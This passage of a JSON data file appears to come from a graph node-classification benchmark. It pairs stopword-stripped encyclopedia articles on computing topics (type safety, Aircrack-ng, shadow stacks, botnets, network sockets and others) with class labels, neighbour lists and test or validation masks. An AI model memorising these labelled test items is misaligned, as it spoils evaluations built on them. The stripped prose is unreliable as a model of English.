excluding problems e.g type safety usually requirement toy language proposed academic programming language research many languages hand big human-generated type safety proofs often require checking thousands cases nevertheless languages standard ml rigorously defined semantics proved meet one definition type safety languages haskell believed meet definition type safety provided certain escape features used example haskell unsafeperformio used escape usual restricted environment i/o possible circumvents type system used break type safety type punning another example escape feature regardless properties language definition certain errors may occur run-time due bugs implementation linked libraries written languages errors could render given implementation type unsafe certain circumstances early version sun java virtual machine vulnerable sort problem programming languages often colloquially classified strongly typed weakly typed also loosely typed refer certain aspects type safety 1974 liskov zilles defined strongly-typed language one whenever object passed calling function called function type must compatible type declared called function 1977 jackson wrote strongly typed language data area distinct type process state communication requirements terms types contrast weakly typed language may produce unpredictable results may perform implicit type conversion object oriented languages type safety usually intrinsic fact type system place expressed terms class definitions class essentially defines structure objects derived api contract handling objects time new object created comply contract function exchanges objects derived specific class implementing specific interface adhere contract hence function operations permitted object defined methods class object implements guarantee object integrity preserved exceptions object oriented languages allow dynamic modification object structure use reflection modify content object overcome constraints imposed class methods definitions ada designed suitable embedded systems device drivers forms system programming also encourage type-safe programming resolve conflicting goals ada confines type-unsafety certain set special constructs whose names usually begin string unchecked_ unchecked_deallocation effectively banned unit ada text applying pragma pure unit expected programmers use unchecked_ constructs carefully necessary programs use type-safe spark programming language subset ada eliminating potential ambiguities insecurities time adding statically checked contracts language features available spark avoids issues dangling pointers disallowing allocation run time entirely ada2012 adds statically checked contracts language form pre- post-conditions well type invariants c programming language type-safe limited contexts example compile-time error generated attempt made convert pointer one type structure pointer another type structure unless explicit cast used however number common operations non-type-safe example usual way print integer something like codice_2 codice_3 tells codice_4 run-time expect integer argument something like codice_5 tells function expect pointer character-string yet supplies integer argument may accepted compilers produce undefined results partially mitigated compilers gcc checking type correspondences printf arguments format strings addition c like ada provides unspecified undefined explicit conversions unlike ada idioms use conversions common helped give c type-unsafe reputation example standard way allocate memory heap invoke memory allocation function codice_6 argument indicating many bytes required function returns untyped pointer type codice_7 calling code must explicitly implicitly cast appropriate pointer type pre-standardized implementations c required explicit cast therefore code codice_8 became accepted practice features c++ promote type-safe code c type-safe statically type-safe support untyped pointers must accessed using unsafe keyword prohibited compiler level inherent support run-time cast validation casts validated using keyword return null reference cast invalid using c-style cast throw exception cast invalid see c sharp conversion operators undue reliance object type types derived runs risk defeating purpose c type system usually better practice abandon object references favour generics similar templates c++ generics java java language designed enforce type safety anything java happens inside object object instance class implement type safety enforcement object usage needs allocated java allows usage primitive types inside properly allocated objects sometimes part type safety implemented indirectly e.g class bigdecimal represents floating point number arbitrary precision handles numbers expressed finite representation operation bigdecimal.divide calculates new object division two numbers expressed bigdecimal case division finite representation one computes e.g 1/3=0.33333 ... divide method raise exception rounding mode defined operation hence library rather language guarantees object respects contract implicit class definition sml rigorously defined semantics known type-safe however implementations sml including standard ml new jersey sml/nj syntactic variant mythryl mlton provide libraries offer certain unsafe operations facilities often used conjunction implementations foreign function interfaces interact non-ml code c libraries may require data laid specific ways another example sml/nj interactive toplevel must use unsafe operations execute ml code entered user modula-2 strongly typed language design philosophy require unsafe facilities explicitly marked unsafe achieved moving facilities built-in pseudo-library called system must imported used import thus makes visible facilities used unfortunately consequently implemented original language report implementation still remained unsafe facilities type cast syntax variant records inherited pascal could used without prior import difficulty moving facilities system pseudo-module lack identifier facility could imported since identifiers imported syntax iso modula-2 standard corrected type cast facility changing type cast syntax function called cast imported pseudo-module system however unsafe facilities variant records remained available without import pseudo-module system recent revision language applied original design philosophy rigorously first pseudo-module system renamed unsafe make unsafe nature facilities imported explicit remaining unsafe facilities either removed altogether example variant records moved pseudo-module unsafe facilities identifier could imported enabling identifiers introduced order enable facility corresponding enabling identifier must imported pseudo-module unsafe unsafe facilities remain language require import unsafe pascal number type safety requirements kept compilers pascal compiler dictates strict typing two variables assigned unless either compatible conversion integer real assigned identical subtype example following code fragment strict typing variable defined twotypes compatible dualtypes identical even though components user defined type identical assignment t1 d2 illegal assignment t1 t2 would legal subtypes defined identical however assignment t1.q d1.q would legal general common lisp type-safe language common lisp compiler responsible inserting dynamic checks operations whose type safety proven statically however programmer may indicate program compiled lower level dynamic type-checking program compiled mode considered type-safe following examples illustrates c++ cast operators break type safety used incorrectly first example shows basic data types incorrectly casted example codice_9 explicitly prevents compiler performing safe conversion integer floating-point value program runs output garbage floating-point value problem could avoided instead writing codice_10 next example shows object references incorrectly downcasted two child classes members different types downcasting parent class pointer child class pointer resulting pointer may point valid object correct type example leads garbage value printed problem could avoided replacing codice_11 codice_12 throws exception invalid casts",
    "neighbors": [
      6021,
      2062,
      1936,
      11030,
      10649,
      11674,
      10013,
      10145,
      1954,
      3876,
      5796,
      3624,
      428,
      5677,
      7734,
      3767,
      11574,
      8251,
      10043,
      10684,
      2878,
      10049,
      1474,
      11203,
      70,
      8262,
      7627,
      8524,
      5837,
      11212,
      4823,
      479,
      8545,
      4069,
      8421,
      2152,
      363,
      4974,
      5872,
      369,
      8825,
      5363,
      2804,
      3573,
      3577,
      2556,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 4573,
    "label": 4,
    "text": "Signed_and_Encrypted_Email_Over_The_Internet:signed encrypted email internet signed encrypted email internet seeoti initiative approach providing small medium enterprises ability communicate securely one another government defence ministries major aerospace defence contractors allowing play full part defence supply chain seeoti implements secure email specifications defined transglobal secure collaboration program tscp support interoperable signing encryption email messages federated environment addition security labelling email messages supported network border guard able check labels even though messages encrypted meets goal protecting intellectual property global business environment particular importance uk cyber security strategy intellectual property seen key growth economy deep-secure organised trial seeoti uk mod uk council electronic business integrated commercial shelf cots products titus boldon james deep-secure provide system email security functionality deep-secure selected overall winner ukceb excellence awards 2011 work seeoti february 2012 deep-secure partners adept4 intercede trustis providing seeoti solution service nexor provide compatible products",
    "neighbors": [
      11046,
      3930,
      6110
    ],
    "mask": "Test"
  },
  {
    "node_id": 4574,
    "label": 4,
    "text": "GoodSync:goodsync goodsync backup file synchronization program used synchronizing files two directories either one computer computer another storage device e.g another computer removable disc flash drive smartphone computer remote computer server goodsync allows version files maintained multiple computing devices words two devices synchronized user sure current version file available devices regardless last modified several versions",
    "neighbors": [
      9025,
      11201,
      7364,
      3366,
      10185,
      1358,
      7983,
      4623,
      11633,
      11543
    ],
    "mask": "None"
  },
  {
    "node_id": 4575,
    "label": 4,
    "text": "Initiative_for_Open_Authentication:initiative open authentication initiative open authentication oath industry-wide collaboration develop open reference architecture using open standards promote adoption strong authentication close thirty coordinating contributing members proposing standards variety authentication technologies aim lowering costs simplifying use name oath acronym phrase open authentication pronounced english word oath oath related oauth open standard authorization",
    "neighbors": [
      3521,
      4965,
      2558,
      10566,
      7368,
      11175,
      3309,
      10801,
      7958,
      6750
    ],
    "mask": "Test"
  },
  {
    "node_id": 4576,
    "label": 2,
    "text": "Open_Programming_Language:open programming language open programming language opl embedded programming language portable devices run symbian operating system found nokia 9200 9300 9500 communicator series mobile telephone/personal digital assistant pda sony ericsson p800 p900 p910 series classic psion pdas series 3 5/5mx series 7 netbook/netpad well mc218 opl part standard application suite opl also included psion teklogix industrial handhelds workabout mx opl interpreted language similar basic fully visual basic-compatible language oval also developed language originally called organiser programming language developed psion ltd psion organiser designed colly myers first iteration implemented richard harrison martin stamp first implementation without graphics original psion organiser referred psion organiser 1984 came bundled science finance math data packs became truly accessible built-in software psion organiser ii 1986 language went used psion series 3 later psion retired portable digital assistant market project delayed 2003 fledgling symbian developer program released open source language developed sourceforge opl-dev project language available symbian os v8 later mainly due lack interest support major symbian licencees nokia sony ericsson hence opl likely never made available newer generation symbian os phones sony ericsson p990 m600 w950 p1i nokia e61i e90 2010 nokia device developers encouraged use python s60 instead see python s60 console version hello world program gui version nokia series 80 user interface opl structured programming language opl programs contain procedures much like functions programming languages example cruel interrogative program yes button assigned shortcut ctrl+y ctrl+n represented n respectively user input dialog tested statement printing appropriate responses screen note 'get keyword gets user input without using dialog box used simply wait keypress terminating program otherwise would end immediately without giving time user read text output dialog also stored variable variables specific procedure must declared local keyword global variables defined global keyword table uses example variable called 'var opl interfaced advanced psion series 3 features means operating system calls later psion series 5mx changed so-called 'opx library stored system rom z drive 'opx libraries also made available nokia 9210 nokia 9300 nokia 9500 communicators adding opxs routines handling sms managing bluetooth communication opl features include letter g beginning graphical functions letter 'm menus letter 'd dialogs",
    "neighbors": [
      9345,
      9316,
      8262,
      8554,
      9292,
      5998,
      7983,
      847,
      5395
    ],
    "mask": "Test"
  },
  {
    "node_id": 4577,
    "label": 5,
    "text": "Sequenced_Packet_Exchange:sequenced packet exchange sequenced packet exchange spx osi-model transport layer protocol ipx/spx protocol stack reliable connection-oriented protocol similar tcp protocol tcp/ip datagram rather stream protocol spx packet begins header following structure connection control fields contains 4 single-bit flags datastream type serves close spx connection purpose two values used",
    "neighbors": [
      10924
    ],
    "mask": "None"
  },
  {
    "node_id": 4578,
    "label": 9,
    "text": "Martin_Odersky:martin odersky martin odersky born 5 september 1958 german computer scientist professor programming methods école polytechnique fédérale de lausanne epfl switzerland specializes code analysis programming languages designed scala programming language generic java pizza others implemented gj compiler implementation became basis javac java compiler 2007 inducted fellow association computing machinery 1989 received ph.d. eth zurich supervision niklaus wirth best known designer several programming languages including pascal postdoctoral work ibm yale university 12 may 2011 odersky collaborators launched typesafe inc. renamed lightbend inc. company provide commercial support training services scala currently serves chairman chief architect teaches two courses coursera online learning platform functional programming principles scala functional program design scala",
    "neighbors": [
      8057,
      8262,
      8524,
      3823,
      3323,
      8116,
      1783,
      3705,
      1051,
      7775
    ],
    "mask": "Test"
  },
  {
    "node_id": 4579,
    "label": 3,
    "text": "Hacker_(video_game):hacker video game hacker 1985 computer game activision designed steve cartwright released amiga amstrad cpc apple ii atari 8-bit family atari st commodore 64 macintosh ms-dos msx zx spectrum activision executive jim levy introduced hacker reporters pretending something gone wrong attempt connect line company headquarters demonstrate new game several attempts logged mysterious non-activision computer explaining ladies gentlemen game player assumes role hacker person experienced breaking secure computer systems accidentally acquires access non-public system game shipped information play thus building concept player hack system player must attempt hack magma ltd. computer system beginning game guessing logon password password becomes obvious gaining access another means entry later stage game typing help h initial command line gives clue since initial attempts consist guessing likely failing access eventually granted due supposed malfunction security system player player asked identify various parts robot unit pointing cursor relevant parts pressing joystick button parts exotic technical names asynchronous data compactor phlamson joint —this allows room error initially trying guess part name belongs failure identify part correctly forces player take retest 100 percent identification made point player allowed continue player gains control robot travel around globe via secret tunnels deep within earth game text states robot powered manner magma evident player logged magma company network acting remote user global subterranean transport network various strange messages broadcast hinting dangerous experiments company getting far player informed shredded portions secret document containing magma ltd. plans world domination stolen player instructed retrieve document bargaining spies stole located various locations throughout globe player warned must retrieved order prevent u.s. government thwarting plans point player objective clear retrieve strips stolen document deliver washington d.c robot tunnel system extensive unmarked getting around initially exercise trial error throughout globe several cities robot surface interact people primarily spies want bargain piece evidence various surfacing cities player must try convince agents turn piece evidence initially player 5,000 bargain arsenal items grows time bargaining real challenge game determining spy wants get eventually spies whims satisfied pieces secret document note different copies game even computer platform differences items spies want n't enough however magma ltd. discovers player break-in shortly penetration launches security satellite intersects player position demands information supposedly legitimate user would know information queried given player previously game questions answered player taken careful notes information asked rather obscure put pressure player satellites allow player pass checks 4 times another catch cause player get disconnected due suspicious activity addition player time limit tracked movements sru makes player take long system automatically disconnect anyway regardless satellites sensors network also start fail limiting player ability see turns tunnels ahead eventually sru located forcing player rely maps tunnel network make player goes near australia network automatic game issued however knowledge may help future play evading check since game lacks save game feature player fails must start beginning try solve game puzzles late 1987 50,000 copies hacker sold activision third best-selling commodore game info rated hacker four stars five describing interesting concept fair good graphics sound compute praised game initial realism concluded worthy addition software collection especially enjoy adventure games require bit thought investment time ahoy wrote puzzle nature certain enthrall repel others ... repeated play integral part reaching solution enjoy protracted battle wits find hacker lively test abilities game followed 1986 much difficult sequel player actually recruited based upon assumed success activities original game tasked controlling robot time infiltrate secure facility order retrieve documents known doomsday papers well-guarded vault ensure security united states",
    "neighbors": [
      391,
      9166,
      9006,
      5435,
      4956
    ],
    "mask": "None"
  },
  {
    "node_id": 4580,
    "label": 4,
    "text": "Aircrack-ng:aircrack-ng aircrack-ng network software suite consisting detector packet sniffer wep wpa/wpa2-psk cracker analysis tool 802.11 wireless lans works wireless network interface controller whose driver supports raw monitoring mode sniff 802.11a 802.11b 802.11g traffic program runs linux freebsd macos openbsd windows linux version packaged openwrt also ported android zaurus pda maemo platforms proof concept port made iphone april 2007 team darmstadt university technology germany developed new attack method based paper released rc4 cipher adi shamir new attack named 'ptw decreases number initialization vectors ivs needed decrypt wep key included aircrack-ng suite since 0.9 release aircrack-ng fork original aircrack project found preinstalled tool many linux distributions kali linux parrot share common attributes developed project debian aircrack-ng software suite includes",
    "neighbors": [
      7426,
      7556,
      7557,
      9732,
      6797,
      2961,
      2716,
      10788,
      9640,
      7983,
      8497,
      2739,
      7989,
      823,
      7228,
      8513,
      6466,
      6345,
      1232,
      6993,
      2006,
      10329,
      8922,
      10332,
      733,
      9440,
      3937,
      10346,
      5612,
      10349,
      2671,
      2045,
      2430
    ],
    "mask": "None"
  },
  {
    "node_id": 4581,
    "label": 2,
    "text": "Open_Firmware:open firmware open firmware openboot sun microsystems parlance standard defining interfaces computer firmware system formerly endorsed institute electrical electronics engineers ieee originated sun used sun apple ibm arm non-x86 pci chipset vendors open firmware allows system load platform-independent drivers directly pci card improving compatibility open firmware may accessed forth language shell interface achieves essentially functionality later efi standard initiated intel lower overhead open firmware described ieee standard ieee 1275-1994 reaffirmed open firmware working group ofwg since 1998 therefore officially withdrawn ieee several commercial implementations open firmware released open source community 2006 including sun openboot firmworks openfirmware codegen smartfirmware source code available openbios project sun implementation available bsd license open firmware forth code may compiled fcode bytecode independent computer architecture details instruction set memory hierarchy pci card may include program compiled fcode runs open firmware system way provide platform-independent boot-time diagnostics configuration code device drivers fcode also compact disk driver may require one two kilobytes therefore many i/o cards used sun systems macintoshes used open firmware fcode implements ans forth subset open firmware library open firmware furthermore defines standard way describe hardware system helps operating system better understand host computer relying less user configuration hardware polling example open firmware essential reliably identifying slave i²c devices like temperature sensors hardware monitoring whereas alternative solution performing blind probe i²c bus done software like lm_sensors generic hardware known result serious hardware issues certain circumstances based upon interactive programming language open firmware used efficiently test bring new hardware allows drivers written tested interactively operational video mouse drivers prerequisite graphical interface suitable end-user diagnostics apple shipped diagnostic operating system many power macintoshes sun also shipped fcode-based diagnostic tool suite called openboot diagnostics obdiag used customer service support hardware manufacturing teams sun sparc systems open firmware interface displayed console terminal bootstrapping system software keyboard connected main video display used console terminal open firmware re-entered time pressing keyboard keyboard connected first serial line system usually used console open firmware re-entered sending break serial line system software running various open firmware settings read written using codice_1 command powerpc-based macintosh open firmware interface accessed pressing keys startup using standard pc usb keyboard intel-based macintoshes use open firmware use extensible firmware interface following apple transition intel processors also early versions powerbook 3400 connect open firmware input output modem port default functionality generally used developers troubleshooting i.t personnel common users mac os x operating system provides high level graphical user interface change commonly used open firmware settings instance possible specify boot disk partition without directly using open firmware interface limitations e.g possible select boot usb mass-storage devices open firmware allows imac boot using codice_2 command open firmware settings changed using codice_3 command system software running pegasos interface accessed pressing startup ibm power systems open firmware ok prompt accessed sms boot menu sms boot menu accessed pressing boot sequence hardware checking os boot olpc xo-1 laptop open firmware access requires developer key obtained registration olpc installing key upon power-on boot countdown interrupted upper left key get forth prompt",
    "neighbors": [
      8828,
      8708,
      7045,
      7049,
      5520,
      4241,
      2066,
      10130,
      5270,
      5671,
      4264,
      10153,
      6187,
      4396,
      8877,
      9004,
      8625,
      434,
      3762,
      9777,
      9016,
      11321,
      2811,
      3904,
      5439,
      9665,
      3780,
      9540,
      9932,
      9422,
      6995,
      10332,
      2525,
      5863,
      1515,
      9964,
      3314,
      499,
      9714,
      11125,
      10102,
      1399,
      6904,
      3323,
      3324,
      3838
    ],
    "mask": "Test"
  },
  {
    "node_id": 4582,
    "label": 4,
    "text": "Shadow_stack:shadow stack computer security shadow stack mechanism protecting procedure stored return address stack buffer overflow shadow stack second separate stack shadows program call stack function prologue function stores return address call stack shadow stack function epilogue function loads return address call stack shadow stack compares two records return address differ attack detected typical course action simply terminate program alert system administrators possible intrusion attempt shadow stack similar stack canaries mechanisms aim maintain control-flow integrity protected program detecting attacks tamper stored return address attacker exploitation attempt shadow stacks implemented recompiling programs modified prologues epilogues dynamic binary rewriting techniques achieve effect hardware support unlike call stack also stores local program variables passed arguments spilled registers data shadow stack typically stores second copy function return address shadow stacks provide protection return addresses stack canaries rely secrecy canary value vulnerable non-contiguous write attacks shadow stacks protected guard pages information hiding attacker would also need locate shadow stack overwrite return address stored like stack canaries shadow stacks protect stack data return addresses offer incomplete protection security vulnerabilities result memory safety errors 2016 intel announced upcoming hardware support shadow stacks control-flow enforcement technology shadow stacks face compatibility problems program throws exception longjmp occurs return address top shadow stack match return address popped call stack typical solution problem pop entries shadow stack matching return address found terminate program match found shadow stack multithreaded program would call stack executing thread would also shadow stack shadowing call stacks",
    "neighbors": [
      1474,
      642,
      6754,
      1094,
      5040,
      3473,
      4562,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 4583,
    "label": 4,
    "text": "Access_Control_Matrix:access control matrix computer science access control matrix access matrix abstract formal security model protection state computer systems characterizes rights subject respect every object system first introduced butler w. lampson 1971 access matrix envisioned rectangular array cells one row per subject one column per object entry cell – entry particular subject-object pair – indicates access mode subject permitted exercise object column equivalent access control list object row equivalent access profile subject according model protection state computer system abstracted set objects formula_1 set entities needs protected e.g processes files memory pages set subjects formula_2 consists active entities e.g users processes exists set rights formula_3 form formula_4 formula_5 formula_6 formula_7 right thereby specifies kind access subject allowed process object matrix example exists two processes file device first process ability execute second read file write information device second process read information first define granularity protection mechanisms access control matrix used model static access permissions type access control system model rules permissions change particular system therefore gives incomplete description system access control security policy access control matrix thought abstract model permissions given point time literal implementation two-dimensional array would excessive memory requirements capability-based security access control lists categories concrete access control mechanisms whose static permissions modeled using access control matrices although two mechanisms sometimes presented example butler lampson protection paper simply row-based column-based implementations access control matrix view criticized drawing misleading equivalence systems take account dynamic behaviour",
    "neighbors": [
      3616,
      3723,
      3440,
      2737,
      6162,
      8627,
      1013,
      10968
    ],
    "mask": "Test"
  },
  {
    "node_id": 4584,
    "label": 4,
    "text": "Chameleon_botnet:chameleon botnet chameleon botnet botnet discovered february 28 2013 security research firm spider.io involved infection 120,000 computers generated average 6 million us dollars per month advertising traffic traffic generated infected systems looked advertising parties regular end users browsed web seen legitimate web traffic affected computers windows pcs majority private pcs residential systems make actions software look like legitimate human behavior made mouse infected systems move around pages browsers rebooted system sessions crashed also sophisticated adobe flash javascript scripts executed infected systems least 202 websites targeted botnet 9 billion advertisements served side effect web traffic generated botnet infected systems likely suffered general operating lag slow network connectivity well symptoms indicators pc possibly infected malware removal software like clamwin exterminate infection could removed infected system also possible deactivate malware changing registry infected windows pc manually",
    "neighbors": [
      5766,
      3462,
      6823,
      6797,
      4883,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 4585,
    "label": 4,
    "text": "Shadowserver:shadowserver shadowserver foundation nonprofit security organization gathers analyzes data malicious internet activity including malware botnets computer fraud sends daily network reports subscribers works law enforcement organizations around world cybercrime investigations established 2004 volunteer watchdog group liaises national governments csirts network providers academic institutions financial institutions fortune 500 companies end users improve internet security enhance product capability advance research dismantle criminal infrastructure shadowserver scans ipv4 internet 30 times per day harvests data malware spam bots botnets using large-scale sensor networks honeypots honeyclients placed throughout world uses sinkholes collect data bots ddos attacks also receives additional malware sinkhole data governments industry partners law enforcement agencies established reciprocal data-sharing agreements shadowserver shadowserver stores raw malware data permanently repository new data collected shadowserver analyzes using thousands virtual sandboxes hundreds iron sandboxes regularly re-analyzes raw data previously collected results analyses stored organization analysis cluster shadowserver sends daily custom reports users subscribed reports contain data shadowserver collected analyzed suspicious activity able detect within specific networks regions subscriber responsible example national government might receive data aggregated geo-spatial coordinates defined latitude longitude international network provider might receive data filtered asn shadowserver liaises security organizations national governments csirts dismantle global cybercrime networks example worked fbi europol interpol take avalanche network 2016 also helps law enforcement partners develop strategies cyber security threats mitigate threats emerge focusing cases involve criminal abuse internet ’ infrastructure",
    "neighbors": [
      8133,
      9256,
      2409,
      10952,
      4972,
      4945,
      4883,
      2325,
      4503,
      7515
    ],
    "mask": "None"
  },
  {
    "node_id": 4586,
    "label": 2,
    "text": "Virtual_Telecommunications_Access_Method:virtual telecommunications access method virtual telecommunications access method vtam ibm subsystem implements systems network architecture sna mainframe environments vtam provides application programming interface api communication applications controls communication equipment adapters controllers modern terminology vtam provides communication stack device drivers vtam introduced 1974 series delays major component sna along 370x network control program ncp synchronous data link control sdlc ibm terminology vtam access method software allowing application programs read write data external devices called 'virtual introduced time ibm introducing virtual memory upgrading operating systems system/360 series virtual storage versions vtam supposed successor older telecommunications access methods basic telecommunications access method btam telecommunications access method tcam maintained compatibility reasons vtam comparable virtual storage access method vsam time new supposedly converged access method disk storage originally vtam provided free charge like systems software time however vtam 2 last version freely available acf/vtam advanced communication function/virtual telecommunications access method introduced 1976 provided licence fee major new feature acf/vtam multisystem networking facility introduced implementation intersystem communication among multiple s/370s. limited version acf/vtam known acf/vtame advanced communications function virtual telecommunications access method entry made available dos/vse systems running ibm 4300 vtam renamed sna services feature communications server os/390 software package also provides tcp/ip functions vtam supports several network protocols including sdlc token ring start-stop bisync local channel attached 3270 devices later tcp/ip vtam network communication took place integrated communication adapter mainframe separate programmable front-end processor ibm 3745/3746 communications processor operating system network control program ncp machines longer actively marketed ibm still supported ibm provides hardware maintenance microcode updates estimated 20,000 installed 3745/3746 controllers robust third party industry smaller 3745/3746 specialty companies provide controllers upgrades features related support services vtam sna still use many enterprises initially vtam allowed communication mainframes peripheral equipment terminals distributed processors minicomputers later 'cross-domain services introduced confused tcp/ip domains allowing sna networks one mainframe subsequent development sna network interconnect allowing networks different organizational entities firms interconnected high degree independence finally advanced peer peer networking functions appn added vtam appn mainframe longer heart network nodes network considered peers one reasons appn introduced act decnet-killer time appn actually shipped popularity decnet already declined appn considered overly complex 2012 largely superseded tcp/ip",
    "neighbors": [
      7,
      11656,
      6544,
      7312,
      11539,
      7836,
      10415,
      2616,
      4546,
      1219,
      11131,
      8393,
      8138,
      10958,
      8911,
      3669,
      10072,
      8290,
      868,
      7272,
      10094,
      6647,
      3323,
      2172,
      2813
    ],
    "mask": "Test"
  },
  {
    "node_id": 4587,
    "label": 3,
    "text": "Gameframe:gameframe gameframe hybrid computer system first used online video games industry amalgamation different technologies architectures supercomputers mainframes namely high computing power high throughput 2007 hoplon ibm jointly started gameframe project used ibm system z mainframe computer attached cell/b.e blades eight-core parallel-processing chips power sony playstation 3 host online game taikodom project carried co-operation ibm university california san diego 2009 although cell blades account required computing power high data throughput mainframe particular interest system z provides high level security massive workload handling assuring execution administrative tasks guaranteeing enduring connectivity huge number clients cell/b.e takes resource demanding calculations thus enabling system z fulfill job combination effective financially attractive game server system computation-intensive tasks offloaded expensive cpu cycles system z carried much economical cell blades without offloading server system required would end costing much would financially feasible unlike typical game clusters gameframe handle required transactions e.g keeping track user spaceships weapons virtual money even players simulation trajectory objects checking collisions unified consistent fashion thus host thousand users time slow experienced users added games numerous players like world warcraft tackled problem splitting work among multiple clusters creating duplicate worlds n't communicate cell-augmented mainframe runs hoplon virtual-world middleware called bitverse uses ibm websphere xd db2 software around gameframe ibm virtual universe community evolved",
    "neighbors": [
      9472,
      643,
      9126,
      6311,
      306,
      7218,
      6072,
      8120,
      8122,
      1985,
      1480,
      3025,
      6738,
      342,
      1115,
      859,
      4060,
      3677,
      9445,
      8937,
      10985,
      6004,
      2293,
      1784,
      3323,
      6268,
      6909,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 4588,
    "label": 3,
    "text": "Colony_(video_game):colony video game colony action-adventure game released 1987 amstrad cpc atari 8-bit family commodore 64 msx zx spectrum mastertronic bulldog label owing overpopulation humanity found necessary grow food colonies planets unfortunately mushroom-growing planet player responsible also inhabited hostile native aliens resemble giant insects player must use droid control maintain harvest mushrooms well look protect colony gameplay takes place flip-screen environment consisting colony made-up storehouses specialist buildings mushroom fields areas solar panels surrounding desert alien planet filled various giant insects colony quite complicated game numerous things player must look-after purpose colony grow mushrooms shipment back earth mushrooms grow green i.e lush areas begin seeds quickly grow eventually reaching stage maturity point collected order deposited money later pick-up spacecraft unfortunately mushrooms one many things insects like eat player pick mature mushrooms partially eaten aliens deposited award payment unfit human consumption colony surrounded security fence keeps giant insects colony causing mischief therein unfortunately fence constantly attack insects chew way player droid must maintain fence destroying marauding insects replacing damaged destroyed pieces fence damaged fence sections deposited fence storehouse repair three different types security-fencing used barbed wire weakest wooden-fencing default fencing-type already use around colony game starts steel fencing strongest fencing type colony powered free-standing solar panels located within colony provide power order recharge droid shields weapons well landing beacon required spaceship land unfortunately insects chew pieces well devastate colony power supply checked fencing droid repair damaged panels correct storehouse well find replacements destroyed panels plenty mushrooms grown safely packed-away pick-up player send message earth spaceship sent en route colony pick player also order supplies extra seeds fencing panels useful items ship deliver game provides eta ship player must keep eye ship requires colony landing beacon arrives beacon ship land landing-bay player must screen time droid crushed drop crates supplies pay mushrooms money used next ordering supplies beacon ship dump supplies random surrounding desert many lost aliens beacon drains colony power-supply quickly important leave long necessary also ensure colony power-storage suitably high activating player droid also set traps almost anywhere colony desert order destroy giant insects traps work addition also permanent traps covering areas colony completely open desert e.g main entrance fencing traps always destroy insects wander without disappearing however reliant colony power supply player allows power drop low traps disappear",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4589,
    "label": 5,
    "text": "Network_socket:network socket network socket internal endpoint sending receiving data within node computer network concretely representation endpoint networking software protocol stack entry table listing communication protocol destination status etc form system resource term socket analogous physical female connectors communication two nodes channel visualized cable two male connectors plugging sockets node similarly term port another term female connector used external endpoints node term socket also used internal endpoint local inter-process communication ipc network however analogy strained network communication need one-to-one dedicated communication channel process refer socket using socket descriptor type handle process first requests protocol stack create socket stack returns descriptor process identify socket process passes descriptor back protocol stack wishes send receive data using socket unlike ports sockets specific one node local resources referred directly nodes sockets necessarily associated persistent connection channel communication two nodes necessarily single endpoint example datagram socket used connectionless communication multicast socket used send multiple nodes however practice internet communication sockets generally used connect specific endpoint often persistent connection practice socket usually refers socket internet protocol ip network socket may called internet socket particular transmission control protocol tcp protocol one-to-one connections context sockets assumed associated specific socket address namely ip address port number local node corresponding socket address foreign node node associated socket used foreign process associating socket socket address called binding note local process communicate foreign process sending receiving data foreign socket address access foreign socket use foreign socket descriptor internal foreign node example connection 10.20.30.40:4444 50.60.70.80:8888 local ip address local port foreign ip address foreign port also associated socket end corresponding internal representation connection protocol stack node referred locally numerical socket descriptors say 317 one side 922 process node 10.20.30.40 request communicate node 50.60.70.80 port 8888 request protocol stack create socket communicate destination created socket received socket descriptor 317 communicate via socket using descriptor 317 protocol stack forward data node 50.60.70.80 port 8888 however process node 10.20.30.40 request communicate based foreign socket descriptor e.g socket 922 socket 922 node 50.60.70.80 internal foreign node usable protocol stack node 10.20.30.40 protocol stack today usually provided operating system rather separate library instance set services allow processes communicate network using protocols stack implements operating system forwards payload incoming ip packets corresponding application extracting socket address information ip transport protocol headers stripping headers application data application programming interface api programs use communicate protocol stack using network sockets called socket api development application programs utilize api called socket programming network programming internet socket apis usually based berkeley sockets standard berkeley sockets standard sockets form file descriptor due unix philosophy everything file analogies sockets files functions read write open close practice differences strain analogy different interfaces send receive used socket inter-process communication end generally socket standard internet protocols tcp udp socket address combination ip address port number much like one end telephone connection combination phone number particular extension sockets need source address example sending data program binds socket source address socket used receive data sent address based address internet sockets deliver incoming data packets appropriate application process socket often refers specifically internet socket tcp socket internet socket minimally characterized following distinctions socket internal representation socket descriptor abstract identifier socket address public address subtle always distinguished everyday usage specific definitions socket differ authors ietf request comments internet standards many textbooks well article term socket refers entity uniquely identified socket number textbooks term socket refers local socket address i.e combination ip address port number original definition socket given rfc 147 related arpa network 1971 socket specified 32 bit number even sockets identifying receiving sockets odd sockets identifying sending sockets today however socket communications bidirectional within operating system application created socket socket referred unique integer value called socket descriptor unix-like operating systems microsoft windows command-line tools netstat ss used list established sockets related information example modeled according berkeley socket interface sends string hello world via tcp port 80 host address 1.2.3.4 illustrates creation socket getsocket connecting remote host sending string finally closing socket several types internet socket available datagram socket type network socket provides connectionless point sending receiving data packets packet sent received datagram socket individually addressed routed order reliability guaranteed datagram sockets multiple packets sent one machine process another may arrive order might arrive sending udp broadcasts network always enabled datagram socket order receive broadcast packets datagram socket bound wildcard address broadcast packets may also received datagram socket bound specific address stream socket type network socket provides connection-oriented sequenced unique flow data without record boundaries well-defined mechanisms creating destroying connections detecting errors stream socket transmits data reliably order out-of-band capabilities internet stream sockets typically implemented top tcp applications run across networks using tcp/ip protocol sctp may also used stream sockets raw socket network socket allows direct sending receiving ip packets without protocol-specific transport layer formatting types sockets payload automatically encapsulated according chosen transport layer protocol e.g tcp udp socket user unaware existence protocol headers broadcast payload reading raw socket headers usually included transmitting packets raw socket automatic addition header optional raw sockets used security related applications like nmap one possible use case raw sockets implementation new transport-layer protocols user space raw sockets typically available network equipment used routing protocols internet group management protocol igmpv4 open shortest path first ospf internet control message protocol icmp used among things ping utility socket application programming interfaces apis example based berkeley sockets support raw sockets windows xp released 2001 raw socket support implemented winsock interface three years later microsoft limited winsock raw socket support security concerns socket types implemented transport protocols systems network architecture sna see also unix domain sockets uds internal inter-process communication computer processes provide application services referred servers create sockets start listening state sockets waiting initiatives client programs tcp server may serve several clients concurrently creating child process client establishing tcp connection child process client unique dedicated sockets created connection established state socket-to-socket virtual connection virtual circuit vc also known tcp session established remote socket providing duplex byte stream server may create several concurrently established tcp sockets local port number local ip address mapped server-child process serving client process treated different sockets operating system since remote socket address client ip address and/or port number different i.e 